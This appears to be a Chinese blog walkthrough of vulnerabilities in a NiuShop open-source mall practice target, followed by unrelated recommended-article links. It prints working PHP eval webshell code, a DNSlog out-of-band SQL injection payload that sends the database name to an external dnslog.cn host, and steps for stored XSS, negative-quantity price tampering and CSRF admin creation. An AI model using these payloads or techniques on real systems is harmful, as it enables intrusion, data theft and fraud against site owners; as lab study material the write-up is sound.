niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
GISer_Jing4 小时前
Coze:字节跳动AI开发平台功能和架构解析
javascript·人工智能·架构·开源
神经星星8 小时前
估值准确率超99%!基于YOLOv11的陶瓷分类智能框架融合视觉建模与经济分析,实现文物分类及价值估测
人工智能·机器学习·开源
大千UI工场9 小时前
开源B端生态掘金:从Odoo二次开发到行业专属模块的技术变现
开源
南囝coding11 小时前
分享一个 AI 自动生成流程图的工具
开源·产品
HelloGitHub12 小时前
开源新旗舰 GLM-4.5:不想刷榜,只想干活儿
人工智能·开源·github
陈敬雷-充电了么-CEO兼CTO12 小时前
字节跳动开源Coze,开启AI Agent开发新时代?
人工智能·gpt·chatgpt·开源·大模型·agi·coze
说私域12 小时前
基于开源AI智能名片链动2+1模式与S2B2C商城小程序的微商品牌规范化运营研究
人工智能·小程序·开源
程思扬12 小时前
无界设计新生态:Penpot开源平台与cpolar的云端协同创新实践
大数据·linux·服务器·前端·经验分享·ubuntu·开源
强德亨上校12 小时前
2025年7月21–28日AI开发周报:新模型、新战略与开源亮点
人工智能·科技·gpt·chatgpt·开源·aigc
算家计算12 小时前
FLUX.1 Kontext LoRA专用炼丹炉使用教程:加快训练进程,减少实例费用消耗!
人工智能·开源·aigc